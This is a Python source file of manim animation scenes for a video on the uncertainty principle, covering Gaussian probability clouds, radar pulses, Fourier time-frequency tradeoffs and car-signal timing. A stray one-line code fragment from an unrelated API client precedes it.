return self._execute('clearOwnership', payload=payload, response_object=None)
|
# -*- coding: utf-8 -*-
import scipy
from manimlib.imports import *
from from_3b1b.old.fourier import *
import warnings
warnings.warn("""
Warning: This file makes use of
ContinualAnimation, which has since
been deprecated
""")
FREQUENCY_COLOR = RED
USE_ALMOST_FOURIER_BY_DEFAULT = False
class GaussianDistributionWrapper(Line):
"""
This is meant to encode a 2d normal distribution as
a mobject (so as to be able to have it be interpolated
during animations). It is a line whose center is the mean
mu of a distribution, and whose radial vector (center to end)
is the distribution's standard deviation
"""
CONFIG = {
"stroke_width" : 0,
"mu" : ORIGIN,
"sigma" : RIGHT,
}
def __init__(self, **kwargs):
Line.__init__(self, ORIGIN, RIGHT, **kwargs)
self.change_parameters(self.mu, self.sigma)
def change_parameters(self, mu = None, sigma = None):
curr_mu, curr_sigma = self.get_parameters()
mu = mu if mu is not None else curr_mu
sigma = sigma if sigma is not None else curr_sigma
self.put_start_and_end_on(mu - sigma, mu + sigma)
return self
def get_parameters(self):
""" Return mu_x, mu_y, sigma_x, sigma_y"""
center, end = self.get_center(), self.get_end()
return center, end-center
def get_random_points(self, size = 1):
mu, sigma = self.get_parameters()
return np.array([
np.array([
np.random.normal(mu_coord, sigma_coord)
for mu_coord, sigma_coord in zip(mu, sigma)
])
for x in range(size)
])
class ProbabalisticMobjectCloud(ContinualAnimation):
CONFIG = {
"fill_opacity" : 0.25,
"n_copies" : 100,
"gaussian_distribution_wrapper_config" : {},
"time_per_change" : 1./60,
"start_up_time" : 0,
}
def __init__(self, prototype, **kwargs):
digest_config(self, kwargs)
fill_opacity = self.fill_opacity or prototype.get_fill_opacity()
if "mu" not in self.gaussian_distribution_wrapper_config:
self.gaussian_distribution_wrapper_config["mu"] = prototype.get_center()
self.gaussian_distribution_wrapper = GaussianDistributionWrapper(
**self.gaussian_distribution_wrapper_config
)
self.time_since_last_change = np.inf
group = VGroup(*[
prototype.copy().set_fill(opacity = fill_opacity)
for x in range(self.n_copies)
])
ContinualAnimation.__init__(self, group, **kwargs)
self.update_mobject(0)
def update_mobject(self, dt):
self.time_since_last_change += dt
if self.time_since_last_change < self.time_per_change:
return
self.time_since_last_change = 0
group = self.mobject
points = self.gaussian_distribution_wrapper.get_random_points(len(group))
for mob, point in zip(group, points):
self.update_mobject_by_point(mob, point)
return self
def update_mobject_by_point(self, mobject, point):
mobject.move_to(point)
return self
class ProbabalisticDotCloud(ProbabalisticMobjectCloud):
CONFIG = {
"color" : BLUE,
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
dot = Dot(color = self.color)
ProbabalisticMobjectCloud.__init__(self, dot)
class ProbabalisticVectorCloud(ProbabalisticMobjectCloud):
CONFIG = {
"color" : RED,
"n_copies" : 20,
"fill_opacity" : 0.5,
"center_func" : lambda : ORIGIN,
}
def __init__(self, **kwargs):
digest_config(self, kwargs)
vector = Vector(
RIGHT, color = self.color,
max_tip_length_to_length_ratio = 1,
)
ProbabalisticMobjectCloud.__init__(self, vector)
def update_mobject_by_point(self, vector, point):
vector.put_start_and_end_on(
self.center_func(),
point
)
class RadarDish(SVGMobject):
CONFIG = {
"file_name" : "radar_dish",
"fill_color" : LIGHT_GREY,
"stroke_color" : WHITE,
"stroke_width" : 1,
"height" : 1,
}
class Plane(SVGMobject):
CONFIG = {
"file_name" : "plane",
"color" : LIGHT_GREY,
"height" : 1,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
self.rotate(-TAU/4)
class FalconHeavy(SVGMobject):
CONFIG = {
"file_name" : "falcon_heavy",
"color" : WHITE,
"logo_color" : BLUE_E,
"height" : 1.5,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
self.logo = self[-9:]
self.logo.set_color(self.logo_color)
class RadarPulseSingleton(ContinualAnimation):
CONFIG = {
"speed" : 3.0,
"direction" : RIGHT,
"start_up_time" : 0,
"fade_in_time" : 0.5,
"color" : WHITE,
"stroke_width" : 3,
}
def __init__(self, radar_dish, target, **kwargs):
digest_config(self, kwargs)
self.direction = self.direction/get_norm(self.direction)
self.radar_dish = radar_dish
self.target = target
self.reflection_distance = None
self.arc = Arc(
start_angle = -30*DEGREES,
angle = 60*DEGREES,
)
self.arc.set_height(0.75*radar_dish.get_height())
self.arc.move_to(radar_dish, UP+RIGHT)
self.start_points = np.array(self.arc.points)
self.start_center = self.arc.get_center()
self.finished = False
ContinualAnimation.__init__(self, self.arc, **kwargs)
def update_mobject(self, dt):
arc = self.arc
total_distance = self.speed*self.internal_time
arc.points = np.array(self.start_points)
arc.shift(total_distance*self.direction)
if self.internal_time < self.fade_in_time:
alpha = np.clip(self.internal_time/self.fade_in_time, 0, 1)
arc.set_stroke(self.color, alpha*self.stroke_width)
if self.reflection_distance is None:
#Check if reflection is happening
arc_point = arc.get_edge_center(self.direction)
target_point = self.target.get_edge_center(-self.direction)
arc_distance = np.dot(arc_point, self.direction)
target_distance = np.dot(target_point, self.direction)
if arc_distance > target_distance:
self.reflection_distance = target_distance
#Don't use elif in case the above code creates reflection_distance
if self.reflection_distance is not None:
delta_distance = total_distance - self.reflection_distance
point_distances = np.dot(self.direction, arc.points.T)
diffs = point_distances - self.reflection_distance
shift_vals = np.outer(-2*np.maximum(diffs, 0), self.direction)
arc.points += shift_vals
#Check if done
arc_point = arc.get_edge_center(-self.direction)
if np.dot(arc_point, self.direction) < np.dot(self.start_center, self.direction):
self.finished = True
self.arc.fade(1)
def is_finished(self):
return self.finished
class RadarPulse(ContinualAnimation):
CONFIG = {
"n_pulse_singletons" : 8,
"frequency" : 0.05,
"colors" : [BLUE, YELLOW]
}
def __init__(self, *args, **kwargs):
digest_config(self, kwargs)
colors = color_gradient(self.colors, self.n_pulse_singletons)
self.pulse_singletons = [
RadarPulseSingleton(*args, color = color, **kwargs)
for color in colors
]
pluse_mobjects = VGroup(*[ps.mobject for ps in self.pulse_singletons])
ContinualAnimation.__init__(self, pluse_mobjects, **kwargs)
def update_mobject(self, dt):
for i, ps in enumerate(self.pulse_singletons):
ps.internal_time = self.internal_time - i*self.frequency
ps.update_mobject(dt)
def is_finished(self):
return all([ps.is_finished() for ps in self.pulse_singletons])
class MultipleFlashes(Succession):
CONFIG = {
"run_time_per_flash" : 1.0,
"num_flashes" : 3,
}
def __init__(self, *args, **kwargs):
digest_config(self, kwargs)
kwargs["run_time"] = self.run_time_per_flash
Succession.__init__(self, *[
Flash(*args, **kwargs)
for x in range(self.num_flashes)
])
class TrafficLight(SVGMobject):
CONFIG = {
"file_name" : "traffic_light",
"height" : 0.7,
"post_height" : 2,
"post_width" : 0.05,
}
def __init__(self, **kwargs):
SVGMobject.__init__(self, **kwargs)
post = Rectangle(
height = self.post_height,
width = self.post_width,
stroke_width = 0,
fill_color = WHITE,
fill_opacity = 1,
)
self.move_to(post.get_top(), DOWN)
self.add_to_back(post)
###################
class MentionUncertaintyPrinciple(TeacherStudentsScene):
def construct(self):
title = TextMobject("Heisenberg Uncertainty Principle")
title.to_edge(UP)
dot_cloud = ProbabalisticDotCloud()
vector_cloud = ProbabalisticVectorCloud(
gaussian_distribution_wrapper_config = {"sigma_x" : 0.2},
center_func = lambda : dot_cloud.gaussian_distribution_wrapper.get_parameters()[0],
)
for cloud in dot_cloud, vector_cloud:
cloud.gaussian_distribution_wrapper.next_to(
title, DOWN, 2*LARGE_BUFF
)
vector_cloud.gaussian_distribution_wrapper.shift(3*RIGHT)
def get_brace_text_group_update(gdw, vect, text, color):
brace = Brace(gdw, vect)
text = brace.get_tex("2\\sigma_{\\text{%s}}"%text, buff = SMALL_BUFF)
group = VGroup(brace, text)
def update_group(group):
brace, text = group
brace.match_width(gdw, stretch = True)
brace.next_to(gdw, vect)
text.next_to(brace, vect, buff = SMALL_BUFF)
group.set_color(color)
return Mobject.add_updater(group, update_group)
dot_brace_anim = get_brace_text_group_update(
dot_cloud.gaussian_distribution_wrapper,
DOWN, "position", dot_cloud.color
)
vector_brace_anim = get_brace_text_group_update(
vector_cloud.gaussian_distribution_wrapper,
UP, "momentum", vector_cloud.color
)
self.add(title)
self.add(dot_cloud)
self.play(
Write(title),
self.teacher.change, "raise_right_hand",
self.get_student_changes(*["pondering"]*3)
)
self.play(
Write(dot_brace_anim.mobject, run_time = 1)
)
self.add(dot_brace_anim)
self.wait()
# self.wait(2)
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
run_time = 2,
)
self.wait()
self.add(vector_cloud)
self.play(
FadeIn(vector_brace_anim.mobject)
)
self.add(vector_brace_anim)
self.play(
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : RIGHT},
self.get_student_changes(*3*["confused"]),
run_time = 3,
)
#Back and forth
for x in range(2):
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 2*RIGHT},
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
run_time = 3,
)
self.change_student_modes("thinking", "erm", "sassy")
self.play(
dot_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 0.1*RIGHT},
vector_cloud.gaussian_distribution_wrapper.change_parameters,
{"sigma" : 1*RIGHT},
run_time = 3,
)
self.wait()
class FourierTradeoff(Scene):
CONFIG = {
"show_text" : True,
"complex_to_real_func" : lambda z : z.real,
"widths" : [6, 0.02, 1],
}
def construct(self):
#Setup axes
time_mean = 4
time_axes = Axes(
x_min = 0,
x_max = 2*time_mean,
x_axis_config = {"unit_size" : 1.5},
y_min = -2,
y_max = 2,
y_axis_config = {"unit_size" : 0.5}
)
time_label = TextMobject("Time")
time_label.scale(1.5)
time_label.next_to(
time_axes.x_axis.get_right(), UP+LEFT,
buff = MED_SMALL_BUFF,
)
time_axes.add(time_label)
time_axes.center().to_edge(UP)
time_axes.x_axis.add_numbers(*list(range(1, 2*time_mean)))
frequency_axes = Axes(
x_min = 0,
x_max = 8,
x_axis_config = {"unit_size" : 1.5},
y_min = -0.025,
y_max = 0.075,
y_axis_config = {
"unit_size" : 30,
"tick_frequency" : 0.025,
},
color = TEAL,
)
frequency_label = TextMobject("Frequency")
frequency_label.scale(1.5)
frequency_label.next_to(
frequency_axes.x_axis.get_right(), UP+LEFT,
buff = MED_SMALL_BUFF,
)
frequency_label.set_color(FREQUENCY_COLOR)
frequency_axes.add(frequency_label)
frequency_axes.move_to(time_axes, LEFT)
frequency_axes.to_edge(DOWN, buff = LARGE_BUFF)
frequency_axes.x_axis.add_numbers()
# Graph information
#x-coordinate of this point determines width of wave_packet graph
width_tracker = ExponentialValueTracker(0.5)
get_width = width_tracker.get_value
def get_wave_packet_function():
factor = 1./get_width()
return lambda t : (factor**0.25)*np.cos(4*TAU*t)*np.exp(-factor*(t-time_mean)**2)
def get_wave_packet():
graph = time_axes.get_graph(
get_wave_packet_function(),
num_graph_points = 200,
)
graph.set_color(YELLOW)
return graph
time_radius = 10
def get_wave_packet_fourier_transform():
return get_fourier_graph(
frequency_axes,
get_wave_packet_function(),
t_min = time_mean - time_radius,
t_max = time_mean + time_radius,
n_samples = 2*time_radius*17,
complex_to_real_func = self.complex_to_real_func,
color = FREQUENCY_COLOR,
)
wave_packet = get_wave_packet()
wave_packet_update = UpdateFromFunc(
wave_packet,
lambda g : Transform(g, get_wave_packet()).update(1)
)
fourier_graph = get_wave_packet_fourier_transform()
fourier_graph_update = UpdateFromFunc(
fourier_graph,
lambda g : Transform(g, get_wave_packet_fourier_transform()).update(1)
)
arrow = Arrow(
wave_packet, frequency_axes.coords_to_point(
4, frequency_axes.y_max/2,
),
color = FREQUENCY_COLOR,
)
fourier_words = TextMobject("Fourier Transform")
fourier_words.next_to(arrow, LEFT, buff = MED_LARGE_BUFF)
sub_words = TextMobject("(To be explained shortly)")
sub_words.set_color(BLUE)
sub_words.scale(0.75)
sub_words.next_to(fourier_words, DOWN)
#Draw items
self.add(time_axes, frequency_axes)
self.play(ShowCreation(wave_packet, rate_func = double_smooth))
anims = [ReplacementTransform(
wave_packet.copy(), fourier_graph
)]
if self.show_text:
anims += [
GrowArrow(arrow),
Write(fourier_words, run_time = 1)
]
self.play(*anims)
# self.play(FadeOut(arrow))
self.wait()
for width in self.widths:
self.play(
width_tracker.set_value, width,
wave_packet_update,
fourier_graph_update,
run_time = 3
)
if sub_words not in self.mobjects and self.show_text:
self.play(FadeIn(sub_words))
else:
self.wait()
self.wait()
class ShowPlan(PiCreatureScene):
def construct(self):
self.add_title()
words = self.get_words()
self.play_sound_anims(words[0])
self.play_doppler_anims(words[1])
self.play_quantum_anims(words[2])
def add_title(self):
title = TextMobject("The plan")
title.scale(1.5)
title.to_edge(UP)
h_line = Line(LEFT, RIGHT).scale(FRAME_X_RADIUS)
h_line.next_to(title, DOWN)
self.add(title, h_line)
def get_words(self):
trips = [
("sound waves", "(time vs. frequency)", YELLOW),
("Doppler radar", "(distance vs. velocity)", GREEN),
("quantum particles", "(position vs. momentum)", BLUE),
]
words = VGroup()
for topic, tradeoff, color in trips:
word = TextMobject("Uncertainty for", topic, tradeoff)
word[1:].set_color(color)
word[2].scale(0.75)
word[2].next_to(word[1], DOWN, buff = 1.5*SMALL_BUFF)
words.add(word)
words.arrange(DOWN, aligned_edge = LEFT, buff = MED_LARGE_BUFF)
words.to_edge(LEFT)
return words
def play_sound_anims(self, word):
morty = self.pi_creature
wave = FunctionGraph(
lambda x : 0.3*np.sin(15*x)*np.sin(0.5*x),
x_min = 0, x_max = 30,
step_size = 0.001,
)
wave.next_to(word, RIGHT)
rect = BackgroundRectangle(wave, fill_opacity = 1)
rect.stretch(2, 1)
rect.next_to(wave, LEFT, buff = 0)
always_shift(wave, direction=LEFT, rate=5)
wave_fader = UpdateFromAlphaFunc(
wave,
lambda w, a : w.set_stroke(width = 3*a)
)
checkmark = self.get_checkmark(word)
self.add(wave)
self.add_foreground_mobjects(rect, word)
self.play(
Animation(word),
wave_fader,
morty.change, "raise_right_hand", word
)
self.wait(2)
wave_fader.rate_func = lambda a : 1-smooth(a)
self.add_foreground_mobjects(checkmark)
self.play(
Write(checkmark),
morty.change, "happy",
wave_fader,
)
self.remove_foreground_mobjects(rect, word)
self.add(word)
self.wait()
def play_doppler_anims(self, word):
morty = self.pi_creature
radar_dish = RadarDish()
radar_dish.next_to(word, DOWN, aligned_edge = LEFT)
target = Plane()
# target.match_height(radar_dish)
target.next_to(radar_dish, RIGHT, buff = LARGE_BUFF)
always_shift(target, direction = RIGHT, rate = 1.25)
pulse = RadarPulse(radar_dish, target)
checkmark = self.get_checkmark(word)
self.add(target)
self.play(
Write(word),
DrawBorderThenFill(radar_dish),
UpdateFromAlphaFunc(
target, lambda m, a : m.set_fill(opacity = a)
),
morty.change, "pondering",
run_time = 1
)
self.add(pulse)
count = it.count() #TODO, this is not a great hack...
while not pulse.is_finished() and next(count) < 15:
self.play(
morty.look_at, pulse.mobject,
run_time = 0.5
)
self.play(
Write(checkmark),
UpdateFromAlphaFunc(
target, lambda m, a : m.set_fill(opacity = 1-a)
),
FadeOut(radar_dish),
morty.change, "happy"
)
self.wait()
def play_quantum_anims(self, word):
morty = self.pi_creature
dot_cloud = ProbabalisticDotCloud()
gdw = dot_cloud.gaussian_distribution_wrapper
gdw.next_to(word, DOWN, MED_LARGE_BUFF)
gdw.rotate(5*DEGREES)
gdw.save_state()
gdw.scale(0)
checkmark = self.get_checkmark(word)
ish = TextMobject("$\\dots$ish")
ish.next_to(checkmark, RIGHT, -SMALL_BUFF, DOWN)
self.add(dot_cloud)
self.play(
Write(word),
FadeIn(dot_cloud.mobject),
morty.change, "confused",
)
self.play(gdw.restore, run_time = 2)
self.play(Write(checkmark))
self.wait()
self.play(
Write(ish),
morty.change, 'maybe'
)
self.wait(6)
##
def get_checkmark(self, word):
checkmark = TexMobject("\\checkmark")
checkmark.set_color(GREEN)
checkmark.scale(1.25)
checkmark.next_to(word[1], UP+RIGHT, buff = 0)
return checkmark
class StartWithIntuition(TeacherStudentsScene):
def construct(self):
self.teacher_says(
"You already \\\\ have this \\\\ intuition",
bubble_kwargs = {
"height" : 3.5,
"width" : 3,
},
)
self.change_student_modes("pondering", "erm", "maybe")
self.look_at(VectorizedPoint(4*LEFT + 2*UP))
self.wait(5)
class TwoCarsAtRedLight(Scene):
CONFIG = {
"text_scale_val" : 0.75,
}
def construct(self):
self.pull_up_behind()
self.flash_in_sync_short_time()
self.show_low_confidence()
self.flash_in_sync_long_time()
self.show_high_confidence()
def pull_up_behind(self):
#Setup Traffic light
traffic_light = TrafficLight()
traffic_light.move_to(6*RIGHT + 2.5*DOWN, DOWN)
source_point = VectorizedPoint(
traffic_light[2].get_right()
)
screen = Line(ORIGIN, UP)
screen.next_to(source_point, RIGHT, LARGE_BUFF)
red_light = Spotlight(
color = RED,
source_point = source_point,
radius = 0.5,
screen = screen,
num_levels = 20,
opacity_function = lambda r : 1/(10*r**2+1)
)
red_light.fade(0.5)
red_light.rotate(TAU/2, about_edge = LEFT)
self.add(red_light, traffic_light)
#Setup cars
car1, car2 = cars = self.cars = VGroup(*[
Car() for x in range(2)
])
cars.arrange(RIGHT, buff = LARGE_BUFF)
cars.next_to(
traffic_light, LEFT,
buff = LARGE_BUFF, aligned_edge = DOWN
)
car2.pi_creature.set_color(GREY_BROWN)
car1.start_point = car1.get_corner(DOWN+RIGHT)
car1.shift(FRAME_X_RADIUS*LEFT)
#Pull up car
self.add(cars)
self.play(
SwitchOn(
red_light,
rate_func = squish_rate_func(smooth, 0, 0.3),
),
Animation(traffic_light),
self.get_flashes(car2, num_flashes = 3),
MoveCar(
car1, car1.start_point,
run_time = 3,
rate_func = rush_from,
)
)
def flash_in_sync_short_time(self):
car1, car2 = cars = self.cars
#Setup axes
axes = Axes(
x_min = 0,
x_max = 5,
y_min = 0,
y_max = 2,
y_axis_config = {
"tick_frequency" : 0.5,
},
)
axes.x_axis.add_numbers(1, 2, 3)
time_label = TextMobject("Time")
time_label.scale(self.text_scale_val)
time_label.next_to(axes.x_axis.get_right(), DOWN)
y_title = TextMobject("Signal")
y_title.scale(self.text_scale_val)
y_title.next_to(axes.y_axis, UP, SMALL_BUFF)
axes.add(time_label, y_title)
axes.to_corner(UP+LEFT, buff = MED_SMALL_BUFF)
graph = axes.get_graph(
self.get_multispike_function(list(range(1, 4))),
x_min = 0.8,
x_max = 3.8,
)
graph.set_color(YELLOW)
#Label short duration
brace = Brace(Line(
axes.input_to_graph_point(1, graph),
axes.input_to_graph_point(3, graph),
), UP)
text = TextMobject("Short duration observation")
text.scale(self.text_scale_val)
text.next_to(brace, UP, SMALL_BUFF)
text.align_to(
axes.coords_to_point(0.25, 0), LEFT
)
self.play(
self.get_flashes(car1, num_flashes = 2),
self.get_flashes(car2, num_flashes = 2),
LaggedStartMap(FadeIn, VGroup(
axes, time_label, y_title,
))
)
self.play(
self.get_flashes(car1, num_flashes = 3),
self.get_flashes(car2, num_flashes = 3),
ShowCreation(graph, rate_func=linear, run_time = 3)
)
self.play(
self.get_flashes(car1, num_flashes = 10),
self.get_flashes(car2, num_flashes = 10, run_time_per_flash = 0.98),
GrowFromCenter(brace),
Write(text),
)
self.time_axes = axes
self.time_graph = graph
self.time_graph_label = VGroup(
brace, text
)
def show_low_confidence(self):
car1, car2 = cars = self.cars
time_axes = self.time_axes
#Setup axes
frequency_axes = Axes(
x_min = 0,
x_max = 3,
y_min = 0,
y_max = 1.5,
y_axis_config = {
"tick_frequency" : 0.5,
}
)
frequency_axes.next_to(time_axes, DOWN, LARGE_BUFF)
frequency_axes.set_color(LIGHT_GREY)
frequency_label = TextMobject("Frequency")
frequency_label.scale(self.text_scale_val)
frequency_label.next_to(frequency_axes.x_axis.get_right(), DOWN)
frequency_axes.add(
frequency_label,
VectorizedPoint(frequency_axes.y_axis.get_top())
)
frequency_axes.x_axis.add_numbers(1, 2)
frequency_graph = frequency_axes.get_graph(
lambda x : np.exp(-4*(x-1)**2),
x_min = 0,
x_max = 2,
)
frequency_graph.set_color(RED)
peak_point = frequency_axes.input_to_graph_point(
1, frequency_graph
)
#Setup label
label = TextMobject("Low confidence")
label.scale(self.text_scale_val)
label.move_to(peak_point + UP+RIGHT, DOWN)
label.match_color(frequency_graph)
arrow = Arrow(label.get_bottom(), peak_point, buff = 2*SMALL_BUFF)
arrow.match_color(frequency_graph)
self.play(
ReplacementTransform(
self.time_axes.copy(), frequency_axes
),
ReplacementTransform(
self.time_graph.copy(), frequency_graph
),
)
self.play(
Write(label),
GrowArrow(arrow)
)
self.wait()
self.frequency_axes = frequency_axes
self.frequency_graph = frequency_graph
self.frequency_graph_label = VGroup(
label, arrow
)
def flash_in_sync_long_time(self):
time_graph = self.time_graph
time_axes = self.time_axes
frequency_graph = self.frequency_graph
frequency_axes = self.frequency_axes
n_spikes = 12
new_time_graph = time_axes.get_graph(
self.get_multispike_function(list(range(1, n_spikes+1))),
x_min = 0.8,
x_max = n_spikes + 0.8,
)
new_time_graph.match_color(time_graph)
new_frequency_graph = frequency_axes.get_graph(
lambda x : np.exp(-500*(x-1)**2),
x_min = 0,
x_max = 2,
num_anchors = 500,
)
new_frequency_graph.match_color(self.frequency_graph)
def pin_freq_graph_end_points(freq_graph):
freq_graph.points[0] = frequency_axes.coords_to_point(0, 0)
freq_graph.points[-1] = frequency_axes.coords_to_point(2, 0)
self.play(LaggedStartMap(
FadeOut, VGroup(
self.time_graph_label,
self.frequency_graph_label,
self.time_graph,
)
))
self.play(
ApplyMethod(
self.time_axes.x_axis.stretch, 2.5, 0,
{"about_edge" : LEFT},
run_time = 4,
rate_func = squish_rate_func(smooth, 0.3, 0.6),
),
UpdateFromFunc(
self.time_axes.x_axis.tip,
lambda m : m.move_to(
self.time_axes.x_axis.get_right(),
LEFT
)
),
ShowCreation(
new_time_graph,
run_time = n_spikes,
rate_func=linear,
),
ApplyMethod(
frequency_graph.stretch, 0.1, 0,
run_time = n_spikes,
),
UpdateFromFunc(frequency_graph, pin_freq_graph_end_points),
*[
self.get_flashes(car, num_flashes = n_spikes)
for car in self.cars
]
)
self.new_time_graph = new_time_graph
self.new_frequency_graph = new_frequency_graph
def show_high_confidence(self):
#Frequency stuff
arrow = self.frequency_graph_label[1]
label = TextMobject("High confidence")
label.scale(self.text_scale_val)
label.next_to(arrow.get_start(), UP, SMALL_BUFF)
label.match_color(arrow)
frequency_axes = self.frequency_axes
#Time stuff
new_time_graph = self.new_time_graph
brace = Brace(new_time_graph, UP, buff = SMALL_BUFF)
text = TextMobject("Long duration observation")
text.scale(self.text_scale_val)
text.next_to(brace, UP, buff = SMALL_BUFF)
self.play(
FadeIn(label),
GrowArrow(arrow),
*list(map(self.get_flashes, self.cars))
)
self.play(
GrowFromCenter(brace),
Write(text, run_time = 1),
*list(map(self.get_flashes, self.cars))
)
self.play(*[
self.get_flashes(car, num_flashes = 10)
for car in self.cars
])
###
def get_flashes(self, car, colors = [YELLOW, RED], num_flashes = 1, **kwargs):
return AnimationGroup(*[
MultipleFlashes(light, color, num_flashes = num_flashes, **kwargs)
for light, color in zip(car.get_lights(), colors)
])
def get_multispike_function(self, spike_times):
return lambda x : sum([
1.25*np.exp(-100*(x-m)**2)
for m in spike_times
])
class VariousMusicalNotes(Scene):
def construct(self):
freq = 20
# x-coordinate of this point represents log(a)
# where the bell curve component of the signal
# is exp(-a*(x**2))
graph_width_tracker = ExponentialValueTracker(1)
def get_graph():
a = graph_width_tracker.get_value()
return FunctionGraph(
lambda x : np.exp(-a*x**2)*np.sin(freq*x)-0.5,
step_size = 0.001,
)
graph = get_graph()
def graph_update(graph):
graph.points = get_graph().points
graph_update_anim = UpdateFromFunc(graph, graph_update)
def change_width_anim(width, **kwargs):
a = 2.0/(width**2)
return AnimationGroup(
ApplyMethod(graph_width_tracker.set_value, a),
graph_update_anim,
**kwargs
)
change_width_anim(FRAME_X_RADIUS).update(1)
graph_update_anim.update(0)
phrases = [
TextMobject(*words.split(" "))
for words in [
"Very clear frequency",
"Less clear frequency",
"Extremely unclear frequency",
]
]
#Show graphs and phrases
widths = [FRAME_X_RADIUS, 1, 0.2]
for width, phrase in zip(widths, phrases):
brace = Brace(Line(LEFT, RIGHT), UP)
brace.stretch(width, 0)
brace.next_to(graph.get_center(), UP, buff = 1.2)
phrase.next_to(brace, UP)
if width is widths[0]:
self.play(ShowCreation(graph, rate_func=linear)),
self.play(
GrowFromCenter(brace),
Write(phrase, run_time = 1)
)
else:
self.play(
change_width_anim(width),
ReplacementTransform(
VGroup(last_phrase, last_brace),
VGroup(phrase, brace),
rate_func = squish_rate_func(smooth, 0.5, 1),
),
run_time = 2
)
self.wait()
# self.play(*map(FadeOut, [graph, brace, phrase]))
last_phrase = phrase
last_brace = brace
#Talk about correlations
short_signal_words = TextMobject(
"Short", "signal", "correlates",
"with", "wide range", "of frequencies"
)
long_signal_words = TextMobject(
"Only", "wide", "signals", "correlate",
"with a", "short range", "of frequencies"
)
phrases = VGroup(short_signal_words, long_signal_words)
for phrase in phrases:
phrase.scale(0.8)
phrase.set_color_by_tex_to_color_map({
"short" : RED,
"long" : GREEN,
"wide" : GREEN,
}, case_sensitive = False)
phrases.arrange(DOWN)
phrases.to_edge(UP)
long_graph = FunctionGraph(
lambda x : 0.5*np.sin(freq*x),
x_min = -FRAME_WIDTH,
x_max = FRAME_WIDTH,
n_components = 0.001
)
long_graph.set_color(BLUE)
long_graph.next_to(graph, UP, MED_LARGE_BUFF)
self.play(
ShowCreation(long_graph),
*list(map(FadeOut, [last_brace, last_phrase]))
)
self.play(
Write(short_signal_words),
change_width_anim(widths[2])
)
self.play(
long_graph.stretch, 0.35, 0,
long_graph.set_color, GREEN,
run_time = 5,
rate_func = wiggle
)
self.wait()
self.play(
Write(long_signal_words),
change_width_anim(widths[0]),
)
self.play(
long_graph.stretch, 0.95, 0,
long_graph.set_color, average_color(GREEN, BLUE),
run_time = 4,
rate_func = wiggle
)
self.wait()
class CrossOutDefinitenessAndCertainty(TeacherStudentsScene):
def construct(self):
words = VGroup(
TextMobject("Definiteness"),
TextMobject("Certainty"),
)
words.arrange(DOWN)
words.next_to(self.teacher, UP+LEFT)
crosses = VGroup(*list(map(Cross, words)))
self.add(words)
self.play(
self.teacher.change, "sassy",
ShowCreation(crosses[0])
)
self.play(
self.get_student_changes(*3*["erm"]),
ShowCreation(crosses[1])
)
self.wait(2)
class BringInFourierTranform(TeacherStudentsScene):
def construct(self):
fourier = TextMobject("Fourier")
fourier.scale(1.5)
fourier.next_to(self.teacher.get_corner(UP+LEFT), UP, LARGE_BUFF)
fourier.save_state()
fourier.shift(DOWN)
fourier.fade(1)
self.play(
self.teacher.change, "raise_right_hand",
fourier.restore
)
self.change_student_modes("happy", "erm", "confused")
self.look_at(3*LEFT + 2*UP)
self.wait(3)
class LastVideoWrapper(Scene):
def construct(self):
title = TextMobject("Visualizing the Fourier Transform")
title.to_edge(UP)
screen_rect = ScreenRectangle(height = 6)
screen_rect.next_to(title, DOWN)
self.add(title)
self.play(ShowCreation(screen_rect))
self.wait()
class FourierRecapScene(DrawFrequencyPlot):
CONFIG = {
"frequency_axes_config" : {
"x_max" : 10.0,
"x_axis_config" : {
"unit_size" : 0.7,
"numbers_to_show" : list(range(1, 10, 1)),
}
},
"initial_winding_frequency" : 0.1,
}
def construct(self):
self.setup_axes()
self.preview_fourier_plot()
self.wrap_signal_around_circle()
self.match_winding_to_beat_frequency()
self.follow_center_of_mass()
self.draw_fourier_plot()
self.set_color_spike()
def setup_axes(self):
self.remove(self.pi_creature)
time_axes = self.get_time_axes()
time_axes.to_edge(UP, buff = MED_SMALL_BUFF)
time_axes.scale(0.9, about_edge = UP)
frequency_axes = self.get_frequency_axes()
circle_plane = self.get_circle_plane()
self.add(time_axes)
self.set_variables_as_attrs(
time_axes, frequency_axes,
circle_plane
)
def preview_fourier_plot(self):
time_graph = self.graph = self.get_time_graph(
width = 2,
num_graph_points = 200,
)
fourier_graph = self.get_fourier_transform_graph(
time_graph
)
fourier_graph.pointwise_become_partial(fourier_graph, 0.1, 1)
#labels
signal_label = TextMobject("Signal")
fourier_label = TextMobject("Fourier transform")
signal_label.next_to(time_graph, UP, buff = SMALL_BUFF)
fourier_label.next_to(fourier_graph, UP)
fourier_label.match_color(fourier_graph)
self.play(
ShowCreation(time_graph, run_time = 2),
Write(signal_label),
)
self.wait()
self.play(
LaggedStartMap(FadeIn, self.frequency_axes),
ReplacementTransform(
time_graph.copy(),
fourier_graph,
run_time = 2
),
ReplacementTransform(
signal_label.copy(),
fourier_label,
run_time = 2,
rate_func = squish_rate_func(smooth, 0.5, 1)
),
)
self.wait()
self.play(LaggedStartMap(
Indicate, self.frequency_axes.x_axis.numbers,
run_time = 4,
rate_func = wiggle,
))
self.wait()
self.play(*list(map(FadeOut, [
self.frequency_axes, fourier_graph,
signal_label, fourier_label,
])))
self.time_graph = time_graph
self.set_variables_as_attrs(time_graph, fourier_label)
def wrap_signal_around_circle(self):
time_graph = self.time_graph
circle_plane = self.circle_plane
freq = self.initial_winding_frequency
pol_graph = self.get_polarized_mobject(time_graph, freq)
winding_freq_label = self.get_winding_frequency_label()
winding_freq_label.add_to_back(BackgroundRectangle(winding_freq_label))
winding_freq_label.move_to(circle_plane.get_top(), DOWN)
self.add_foreground_mobjects(winding_freq_label)
self.play(
Write(circle_plane, run_time = 1),
ReplacementTransform(
time_graph.copy(), pol_graph,
path_arc = -TAU/4,
run_time_per_flash = 2,
run_time = 2,
),
FadeIn(winding_freq_label),
)
freq = 0.3
self.change_frequency(freq, run_time = 2)
ghost_pol_graph = pol_graph.copy()
self.remove(pol_graph)
self.play(ghost_pol_graph.set_stroke, {"width" : 0.5})
self.play(
*self.get_vector_animations(time_graph),
run_time = 15
)
self.remove(ghost_pol_graph)
self.wait()
